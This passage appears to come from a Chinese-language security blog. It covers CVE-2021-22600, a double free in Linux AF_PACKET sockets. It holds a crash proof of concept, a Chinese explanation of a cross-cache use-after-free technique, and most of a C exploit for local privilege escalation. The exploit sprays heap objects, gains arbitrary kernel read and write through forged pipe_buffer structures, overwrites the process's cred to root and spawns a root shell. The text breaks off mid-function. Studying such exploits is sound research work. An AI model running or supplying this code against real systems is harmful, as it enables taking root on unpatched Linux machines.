tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

/* Print the PoC banner. Fix: "Proof-of-concet" -> "Proof-of-concept". */
void print_banner(void)
{
puts(SUCCESS_MSG("-------- CVE-2021-22600 Proof-of-concept --------"));
puts(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------"));
puts(SUCCESS_MSG("-----------------------------------------------\n"));
}

/* Userspace mirror of the kernel request struct. The three trailing
 * fields match struct tpacket_req3, so one struct is large enough for
 * both V2-sized and V3-sized PACKET_*_RING requests. */
struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
unsigned int tp_retire_blk_tov;
unsigned int tp_sizeof_priv;
unsigned int tp_feature_req_word;
};

/* TPACKET ring protocol versions, as in <linux/if_packet.h> */
enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};

/* SOL_PACKET setsockopt() optnames, as in <linux/if_packet.h> */
#define PACKET_RX_RING 5
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/*
 * Trigger the CVE-2021-22600 double free:
 *  1. create an AF_PACKET socket (CAP_NET_RAW obtained via user namespace),
 *  2. allocate a V3 RX ring — pg_vec is recorded in BOTH rb->pg_vec and
 *     the union field rb->prb_bdqc.pkbdq,
 *  3. free the ring (tp_block_nr == 0) — rb->pg_vec is freed, but the
 *     stale copy survives in the union,
 *  4. switch the socket version to V2,
 *  5. tear the ring down again — the stale pointer is now treated as
 *     rx_owner_map and freed a second time, tripping the kernel's
 *     double-free detection and crashing the machine.
 * Fix applied: log-message typo "Switing" -> "Switching".
 */
void proof_of_concept(void)
{
struct tpacket_req req;
int socket_fd, version;
int ret;

print_banner();

log_info("[*] Prepare env...");

bind_core(0);

unshare_setup();

log_info("[*] Creating packet socket...");

socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
err_exit("FAILED to create socket");
}

log_info("[*] Creating V3 RX ring buffer...");

version = TPACKET_V3;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
log_error("[x] failed at setsockopt(PACKET_VERSION)");
err_exit("FAILED to use setsockopt to set TPACKET_V3");
}

memset(&req, 0, sizeof(req));
req.tp_block_size = 0x1000;
req.tp_block_nr = 1;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to allocate RX ring buffer");
}

log_info("[*] Freeing pgv...");

/* tp_block_nr == 0 && tp_frame_nr == 0 requests ring teardown; the
 * size fields are ignored on this path (values are just markers) */
req.tp_block_size = 0x3361626e;
req.tp_block_nr = 0;
req.tp_frame_size = 0x74747261;
req.tp_frame_nr = 0;

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to free RX ring buffer");
}

log_info("[*] Switching to V2 socket...");

version = TPACKET_V2;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_VERSION)");
err_exit("FAILED to use setsockopt to set TPACKET_V2");
}

log_info("[*] Freeing V2 rx_owner_map to trigger direct double free...");

ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
if (ret < 0) {
perror("[x] failed at setsockopt(PACKET_RX_RING)");
err_exit("FAILED to setsockopt");
}

/* reaching this point means the kernel survived the double free */
puts("[?] You are still alive!?");
system("/bin/sh");
}

/* Entry point: run the PoC (expected to crash the kernel, not return). */
int main(int argc, char **argv, char **envp)
{
proof_of_concept();
return 0;
}

成功通过 kfree 的 double free 检测造成 kernel crash:

0x02. 漏洞利用

下面我们来看如何利用这个漏洞,得益于 pgv 结构体的大小是可变且可控的,且分配自通用的 GFP_KERNEL ,因此我们有很多种利用方式

虽然笔者选择的内核版本 5.11.16 实际上不存在 GFP_KERNELGFP_KERNEL_ACCOUNT 之间的隔离,利用起来很舒服,但笔者还是决定尝试编写 cross-cache UAF 的攻击方法:

  • 首先堆喷 sk_buff ,分配 pgv 后释放,再堆喷 sk_buff 取回 pgv
  • 将这些 sk_buff 全部释放,从而填满 partial lists,使得 slub page 释放回 buddy system
  • 堆喷 pipe_buffer 以取回这些页面
  • 触发漏洞释放 pgv ,此时我们会有一个 pipe_buffer 被释放回 slub
  • 继续堆喷 pipe_buffer ,每喷一个就检测是否分配到了 victim,当分配到 victim 时跳出
  • 此时我们便有着对同一内核对象的两个 pipe_buffer 引用,且由于我们是检测到 victim 便停止,因此我们可以保证 victim object 必定在 cpu slab 上,从而避免了后续的堆喷过程
  • 最后就是惯例的使用和 pipe_buffer 一样分配自 GFP_KERNEL_ACCOUNTmsg_msgseg 去不停改写 pipe_buffer 以完成对内核空间的任意地址读写,这里有个小点是我们的 pipe 的 head (写起始)与 tail (读起始)都需要从 pipe_buffer[0] 往后至少移动一个,因为 pipe_buffer[0]::pagemsg_msgseg::next 是重叠的,会造成干扰( 依稀记得笔者本科那会在刚发现这种利用手法时调这玩意调了半天

有了内核空间的任意读写权限,基本上就是想做什么做什么了,这里我们选择找到当前进程的 task_struct 并改写 cred 的 uid 为 root,这是一种经典的 data-only 的攻击, 不依赖于特定版本的内核镜像,理论上只要你有这个洞就能成功打

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
/**
* Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
*
* This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stddef.h>
#include <stdint.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/prctl.h>

#ifndef IS_ERR
#define IS_ERR(ptr) ((uintptr_t) ptr >= (uintptr_t) -4095UL)
#endif

#ifndef PTR_ERR
#define PTR_ERR(ptr) ((int) (intptr_t) ptr)
#endif

#define SUCCESS_MSG(msg) "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg) "\033[34m\033[1m" msg "\033[0m"
#define ERR_MSG(msg) "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg) puts(SUCCESS_MSG(msg))
#define log_info(msg) puts(INFO_MSG(msg))
#define log_error(msg) puts(ERR_MSG(msg))

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

void err_exit(char *msg)
{
printf(ERR_MSG("[x] Error at: ") "%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}

/* Verify the privilege escalation worked (uid must be 0 by now) and
 * spawn a root shell; exits the process cleanly either way. */
void get_root_shell(void)
{
if(getuid()) {
log_error("[x] Failed to get the root!");
sleep(5);
exit(EXIT_FAILURE);
}

log_success("[+] Successful to get the root.");
log_info("[*] Execve root shell now...");

system("su root -c sh");

/* to exit the process normally, instead of potential segmentation fault */
exit(EXIT_SUCCESS);
}

void bind_core(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf(INFO_MSG("[*] Process binded to core: ") "%d\n", core);
}

void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;

unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);

tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);

tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}

/* Opaque kernel types: only pointers to them are used below */
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* Userspace mirror of the kernel's struct pipe_buffer layout.
 * read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

/* Leading fields of the kernel's struct cred — enough to overwrite the
 * uid/gid family to 0 through the arbitrary-write primitive. */
struct cred {
long usage;
uint32_t uid;
uint32_t gid;
uint32_t suid;
uint32_t sgid;
uint32_t euid;
uint32_t egid;
uint32_t fsuid;
uint32_t fsgid;
};


/* Create a fresh private System V message queue; returns its id or -1. */
int get_msg_queue(void)
{
return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

/* Blocking receive of one message of type `msgtyp` from queue `msqid`
 * into `msgp` (up to `msgsz` payload bytes). Thin msgrcv() wrapper
 * returning the received byte count (or -1) as an int. */
int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ssize_t nbytes;

    nbytes = msgrcv(msqid, msgp, msgsz, msgtyp, 0);
    return (int) nbytes;
}

/**
* Send one message of type `msgtyp` onto queue `msqid`. `msgp` must point
* to a `struct msgbuf`; the payload (msgsz bytes) lives in msgbuf.mtext.
* The mtype field is filled in here before msgsnd().
*/
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
((struct msgbuf*)msgp)->mtype = msgtyp;
return msgsnd(msqid, msgp, msgsz, 0);
}

/* Non-destructive read: with MSG_COPY, `msgtyp` is the index of the
 * msg_msg to copy off the queue; IPC_NOWAIT|MSG_NOERROR avoid blocking
 * and truncation errors. The message stays on the queue. */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
return msgrcv(msqid, msgp, msgsz, msgtyp,
MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

#define SOCKET_NUM 32
#define SK_BUFF_NUM 64

/* Create SOCKET_NUM unix socket pairs, later used to spray sk_buff objects. */
int init_socket_array(int sk_socket[SOCKET_NUM][2])
{
    for (int idx = 0; idx < SOCKET_NUM; idx++) {
        int res = socketpair(AF_UNIX, SOCK_STREAM, 0, sk_socket[idx]);

        if (res < 0) {
            printf("[x] failed to create no.%d socket pair!\n", idx);
            return -1;
        }
    }

    return 0;
}

/* Spray SOCKET_NUM * SK_BUFF_NUM sk_buff allocations of `size` payload bytes. */
int spray_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    int sock_idx, pkt_idx;

    for (sock_idx = 0; sock_idx < SOCKET_NUM; sock_idx++) {
        for (pkt_idx = 0; pkt_idx < SK_BUFF_NUM; pkt_idx++) {
            if (write(sk_socket[sock_idx][0], buf, size) < 0) {
                printf("[x] failed to spray %d sk_buff for %d socket!",
                       pkt_idx, sock_idx);
                return -1;
            }
        }
    }

    return 0;
}

/* Receive everything previously sprayed, releasing the sk_buff objects. */
int free_sk_buff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    int sock_idx, pkt_idx;

    for (sock_idx = 0; sock_idx < SOCKET_NUM; sock_idx++) {
        for (pkt_idx = 0; pkt_idx < SK_BUFF_NUM; pkt_idx++) {
            if (read(sk_socket[sock_idx][1], buf, size) < 0) {
                puts("[x] failed to received sk_buff!");
                return -1;
            }
        }
    }

    return 0;
}

/* Print the exploit banner (output is byte-identical to the original). */
void print_banner(void)
{
    printf(SUCCESS_MSG("--------- CVE-2021-22600 Exploitation ---------") "\n");
    printf(INFO_MSG("-------\t\t Author: ") "arttnba3" INFO_MSG(" \t-------") "\n");
    printf(SUCCESS_MSG("-------- Local Privilege Escalation ---------\n") "\n");
}

/*
 * Userland copy of the kernel's tpacket_req3 layout (setsockopt argument
 * for PACKET_RX_RING / PACKET_TX_RING); the last three fields are only
 * consumed for TPACKET_V3 sockets.
 */
struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
    unsigned int tp_retire_blk_tov;
    unsigned int tp_sizeof_priv;
    unsigned int tp_feature_req_word;
};

/* Ring-buffer protocol versions selectable via PACKET_VERSION. */
enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

/* SOL_PACKET socket option numbers (from <linux/if_packet.h>). */
#define PACKET_RX_RING 5
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

/* Target slab object size: rx_owner_map / pg_vec land in kmalloc-1k. */
#define VICTIM_OBJ_SZ 1024

/* sk_buff payload size chosen so (payload + skb_shared_info) fits kmalloc-1k. */
#define SKBUFF_DATA_SZ (VICTIM_OBJ_SZ - 330)

/* Ring geometry: pg_vec holds TP_BLK_NR page pointers == VICTIM_OBJ_SZ bytes. */
#define TP_BLK_SZ 0x1000
#define TP_BLK_NR (VICTIM_OBJ_SZ / sizeof(char*))
#define TP_FRAME_SZ TP_BLK_SZ
#define TP_FRAME_NR (TP_BLK_SZ * TP_BLK_NR / TP_FRAME_SZ)

/* One command sent from the parent to the packet-socket child process. */
struct exp_cmd {
    size_t cmd;
};

/* Command opcodes understood by exploitation_child(). */
enum {
    CMD_ALLOC_SOCKET = 0,
    CMD_SET_VERSION_V2,
    CMD_SET_VERSION_V3,
    CMD_ALLOC_TX_RING,
    CMD_FREE_TX_RING,
    CMD_ALLOC_RX_RING,
    CMD_FREE_RX_RING,
};

/* parent->child and child->parent command/result pipes */
int p2c_pipe[2], c2p_pipe[2];

/**
 * Child-process command loop: owns the AF_PACKET socket (created inside new
 * namespaces for CAP_NET_RAW) and performs ring-buffer operations on behalf
 * of the parent. Reads one exp_cmd per iteration from p2c_pipe, executes it,
 * and writes the int result back on c2p_pipe. Never returns.
 */
void exploitation_child(void)
{
    struct exp_cmd cmd;
    struct tpacket_req req;
    int socket_fd, version;
    int ret = 0;

    unshare_setup();

    for (;;) {
        read(p2c_pipe[0], &cmd, sizeof(cmd));

        switch (cmd.cmd) {
        case CMD_ALLOC_SOCKET:
            /* raw packet socket — requires CAP_NET_RAW in our netns */
            log_info("[*] Creating packet socket...");

            socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
            if (socket_fd < 0) {
                log_error("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)");
                err_exit("FAILED to create socket");
            }

            break;
        case CMD_SET_VERSION_V2:
            /* switching version after a V3 ring was freed is the vuln core */
            log_info("[*] Set socket version to TPACKET_V2...");

            version = TPACKET_V2;
            ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                             &version, sizeof(version));
            if (ret < 0) {
                log_error("[x] failed at setsockopt(PACKET_VERSION)");
                err_exit("FAILED to use setsockopt to set TPACKET_V2");
            }

            break;
        case CMD_SET_VERSION_V3:
            log_info("[*] Set socket version to TPACKET_V3...");

            version = TPACKET_V3;
            ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                             &version, sizeof(version));
            if (ret < 0) {
                log_error("[x] failed at setsockopt(PACKET_VERSION)");
                err_exit("FAILED to use setsockopt to set TPACKET_V3");
            }

            break;
        case CMD_ALLOC_TX_RING:
            /* non-zero block count => packet_set_ring() allocates pg_vec */
            log_info("[*] Allocating TX ring buffer...");

            memset(&req, 0, sizeof(req));
            req.tp_block_size = TP_BLK_SZ;
            req.tp_block_nr = TP_BLK_NR;
            req.tp_frame_size = TP_FRAME_SZ;
            req.tp_frame_nr = TP_FRAME_NR;

            ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
            if (ret < 0) {
                perror("[x] failed at setsockopt(PACKET_TX_RING)");
                err_exit("FAILED to allocate TX ring buffer");
            }

            break;
        case CMD_FREE_TX_RING:
            /* tp_block_nr == 0 frees the ring; the other fields are ignored
             * (filled with "nba3"/"artt" marker bytes only for debugging) */
            log_info("[*] Freeing TX ring buffer...");

            req.tp_block_size = 0x3361626e;
            req.tp_block_nr = 0;
            req.tp_frame_size = 0x74747261;
            req.tp_frame_nr = 0;

            ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
            if (ret < 0) {
                perror("[x] failed at setsockopt(PACKET_TX_RING)");
                err_exit("FAILED to free TX ring buffer");
            }

            break;
        case CMD_ALLOC_RX_RING:
            log_info("[*] Allocating RX ring buffer...");

            memset(&req, 0, sizeof(req));
            req.tp_block_size = TP_BLK_SZ;
            req.tp_block_nr = TP_BLK_NR;
            req.tp_frame_size = TP_FRAME_SZ;
            req.tp_frame_nr = TP_FRAME_NR;

            ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
            if (ret < 0) {
                perror("[x] failed at setsockopt(PACKET_RX_RING)");
                err_exit("FAILED to allocate RX ring buffer");
            }

            break;
        case CMD_FREE_RX_RING:
            /* freeing under V2 after alloc under V3 double-frees rx_owner_map */
            log_info("[*] Freeing RX ring buffer...");

            req.tp_block_size = 0x3361626e;
            req.tp_block_nr = 0;
            req.tp_frame_size = 0x74747261;
            req.tp_frame_nr = 0;

            ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
            if (ret < 0) {
                perror("[x] failed at setsockopt(PACKET_RX_RING)");
                err_exit("FAILED to free RX ring buffer");
            }

            break;
        default:
            log_error("[x] Unknown command received from parent!");
            break;
        }

        /* report the setsockopt result back to the parent */
        write(c2p_pipe[1], &ret, sizeof(ret));
    }
}

int send_cmd_to_child(size_t cmd_nr)
{
struct exp_cmd cmd = {
.cmd = cmd_nr,
};
int ret;

write(p2c_pipe[1], &cmd, sizeof(cmd));
read(c2p_pipe[0], &ret, sizeof(ret));

return ret;
}

/* sizeof(struct msg_msg) header that precedes each msgsnd payload */
#define MSG_HDR_SZ 0x30
#define MSG_SPRAY_SZ (VICTIM_OBJ_SZ - MSG_HDR_SZ)
#define MSG_SPRAY_NR 2
#define MSG_QUEUE_NR 0x800
#define MSG_TAG_BASE 0x200
/* payload size that makes the msg_msgseg tail land in kmalloc-1k */
#define MSG_EVIL_SZ (0x1000 - MSG_HDR_SZ + VICTIM_OBJ_SZ - 8)

/* index of the queue whose msg_msgseg overlaps the UAF pipe_buffer */
#define ATK_QUEUE_IDX 0

#define PIPE_SPRAY_NR 0x3F0
/* F_SETPIPE_SZ value whose pipe_buffer array is a kmalloc-1k object */
#define PIPE_FCNTL_SZ (VICTIM_OBJ_SZ / 64 * 0x1000)
#define PIPE_RECLAIM_SZ (512 - MSG_HDR_SZ)

int msg_queue[MSG_QUEUE_NR], garbage_msgs[MSG_QUEUE_NR] = { 0 };
int sk_sockets1[SOCKET_NUM][2], sk_sockets2[SOCKET_NUM][2];
int pipe_fd[PIPE_SPRAY_NR][2], uaf_pipe[2], orig_idx = -1, victim_idx = -1;
struct pipe_buffer *leak_pipe_buf, *fake_pipe_buf;
struct pipe_buf_operations *pipe_ops;
/* scratch buffer for msg snd/rcv; large enough for MSG_EVIL_SZ payloads */
size_t msg_buf[0x2000];

/**
 * Arbitrary physical-page read primitive: rewrite the UAF pipe_buffer
 * (which overlaps a msg_msgseg of queue ATK_QUEUE_IDX) so its `page`
 * points at the given struct-page address, then read the page content
 * out through the pipe.
 *
 * @page_addr: vmemmap address of the struct page to read
 * @buf: destination for up to 0xff0 bytes of page data
 */
void arbitrary_read_by_pipe(size_t page_addr, void *buf)
{
    /* pull the overlapping msg_msg/msg_msgseg off the queue... */
    if (read_msg(msg_queue[ATK_QUEUE_IDX], msg_buf, MSG_EVIL_SZ, 0x400) < 0){
        err_exit("FAILED to read msg_msg and msg_msgseg!");
    }

    /* ...forge the pipe_buffer at the overlap offset: non-zero len makes
     * the pipe readable from offset 0 of the target page */
    fake_pipe_buf = (struct pipe_buffer*) &msg_buf[511];
    fake_pipe_buf->page = (struct page*) page_addr;
    fake_pipe_buf->len = 0x1ff8;
    fake_pipe_buf->offset = 0;
    fake_pipe_buf->ops = pipe_ops;

    /* ...and push it back so the kernel pipe_buffer is overwritten */
    if (write_msg(msg_queue[ATK_QUEUE_IDX], msg_buf, MSG_EVIL_SZ, 0x400) < 0) {
        err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
    }

    if (read(uaf_pipe[0], buf, 0xff0) < 0) {
        perror("[x] Unable to read from pipe");
        err_exit("FAILED to read from evil pipe!");
    }
}

/**
 * Arbitrary physical-page write primitive: forge the UAF pipe_buffer with
 * len == 0 (empty, writable from offset 0) pointing at the target page,
 * then write through the pipe. At most 0xffe bytes per call.
 *
 * @page_addr: vmemmap address of the struct page to write
 * @buf: source data
 * @len: byte count (clamped to 0xffe)
 */
void arbitrary_write_by_pipe(size_t page_addr, void *buf, size_t len)
{
    /* note: overlap offset differs from the read primitive (pipe advanced) */
    fake_pipe_buf = (struct pipe_buffer*) &msg_buf[516];

    if (read_msg(msg_queue[ATK_QUEUE_IDX], msg_buf, MSG_EVIL_SZ, 0x400) < 0){
        err_exit("FAILED to read msg_msg and msg_msgseg!");
    }

    fake_pipe_buf->page = (struct page*) page_addr;
    fake_pipe_buf->len = 0;
    fake_pipe_buf->offset = 0;
    fake_pipe_buf->ops = pipe_ops;

    if (write_msg(msg_queue[ATK_QUEUE_IDX], msg_buf, MSG_EVIL_SZ, 0x400) < 0) {
        err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
    }

    len = len > 0xffe ? 0xffe : len;

    if(write(uaf_pipe[1], buf, len) < 0) {
        perror("[x] Unable to write into pipe");
        err_exit("FAILED to write into evil pipe!");
    }
}

/**
 * Main exploit flow (parent process). Stages:
 *   1. fork a child owning the AF_PACKET socket;
 *   2. heap feng-shui: turn the double-freed rx_owner_map (kmalloc-1k)
 *      into an sk_buff data buffer, then into a pipe_buffer array,
 *      producing two pipes sharing one pipe_buffer array (UAF);
 *   3. overlap the UAF pipe_buffer with a msg_msgseg to leak
 *      vmemmap_base / kernel base and build page-level R/W primitives;
 *   4. locate current task_struct and its cred via the "comm" marker,
 *      overwrite uid/gid to 0, spawn a root shell.
 *
 * Statement order is load-bearing throughout (cross-cache timing).
 */
void exploitation(void)
{
    size_t buf[0x2000], kernel_leak, current_pcb_page, *comm_addr;
    char *noise_pages;
    struct rlimit rl;
    int found = 0;      /* NOTE(review): currently unused */
    int ret;
    uint32_t uid, gid;
    uint64_t cred_kaddr, cred_kpage_addr;
    struct cred *cred_data;
    char cred_data_buf[0x1000];

    memset(buf, 0, sizeof(buf));

    print_banner();

    bind_core(0);

    /* raise the fd limit: we need ~2 * PIPE_SPRAY_NR descriptors */
    rl.rlim_cur = 4096;
    rl.rlim_max = 4096;
    if (setrlimit(RLIMIT_NOFILE, &rl) == -1) {
        perror("[x] setrlimit");
        err_exit("FAILED to expand file descriptor's limit!");
    }

    log_info("[*] Creating child process to user packet socket...");

    if (pipe(p2c_pipe) < 0 || pipe(c2p_pipe) < 0) {
        perror("[x] Unable to create pipe");
        err_exit("FAILED to create pipe for communication!");
    }

    ret = fork();
    if (!ret) {
        exploitation_child();
        exit(EXIT_SUCCESS);
    } else if (ret < 0) {
        perror("[x] Unable to fork out child process");
        err_exit("FAILED to create child process for exploit!");
    }

    send_cmd_to_child(CMD_ALLOC_SOCKET);

    log_info("[*] Preparing msg_queue...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        msg_queue[i] = get_msg_queue();
        if (msg_queue[i] < 0) {
            printf("[x] Unable to get %d msg_queue\n", i);
            err_exit("FAILED to create msg_queue!");
        }
    }

    /* pre-fault pages we will dirty later, so the later touch loop does
     * not allocate at a sensitive moment */
    log_info("[*] Preparing mmap area for clearing noisy pages later...");
    noise_pages = mmap(NULL, TP_BLK_NR * 0x1000 * 2, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
    if (noise_pages == MAP_FAILED) {
        perror("[x] Unable to create mmap region");
        err_exit("FAILED to do the mmap!");
    }

    log_info("[*] Preparing pipe...");

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if (pipe(pipe_fd[i]) < 0) {
            printf("[x] Unable to create %d pipe\n", i);
            err_exit("FAILED to prepare pipe!");
        }

        for (int j = 0; j < 0x100; j++) {
            /* identifier: lets us detect later which pipes overlap */
            write(pipe_fd[i][1], &i, sizeof(i));
        }

        if (fcntl(pipe_fd[i][0], F_SETPIPE_SZ, 0x1000 * 8) < 0) {
            perror("[x] Failed to do fcntl on pipe");
            printf("[x] Unable to shrink %d pipe_buffer\n", i);
            err_exit("FAILED to spray pipe_buffer!");
        }
    }

    log_info("[*] Preparing sk_buff and do the half-spraying...");

    if (init_socket_array(sk_sockets1)) {
        err_exit("FAILED to initialize socket group 1!");
    }

    if (init_socket_array(sk_sockets2)) {
        err_exit("FAILED to initialize socket group 2!");
    }

    /* first half of the sk_buff spray fills existing partial slabs */
    if (spray_sk_buff(sk_sockets1, buf, SKBUFF_DATA_SZ)) {
        err_exit("FAILED spray group-1 sk_buff!");
    }

    /* V3 ring alloc creates rx_owner_map; free leaves the dangling record */
    send_cmd_to_child(CMD_SET_VERSION_V3);

    send_cmd_to_child(CMD_ALLOC_RX_RING);

    send_cmd_to_child(CMD_FREE_RX_RING);

    log_info("[*] Clearing noisy pages allocated in pgv...");

    for (size_t i = 0; i < TP_BLK_NR * 2; i++) {
        *(size_t*) &(noise_pages[i * 0x1000]) = *(size_t*) "arttnba3";
    }

    log_info("[*] Spraying another half of sk_buff to get pgv...");

    /* second half of the spray reclaims the freed rx_owner_map as sk_buff */
    if (spray_sk_buff(sk_sockets2, buf, SKBUFF_DATA_SZ)) {
        err_exit("FAILED spray group-2 sk_buff!");
    }

    log_info("[*] Free all sk_buff to fill partial lists and back to buddy...");

    if (free_sk_buff(sk_sockets1, buf, SKBUFF_DATA_SZ)) {
        err_exit("FAILED free group-1 sk_buff!");
    }

    if (free_sk_buff(sk_sockets2, buf, SKBUFF_DATA_SZ)) {
        err_exit("FAILED free group-2 sk_buff!");
    }

    log_info("[*] Spraying half of pipe_buffer...");

    for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
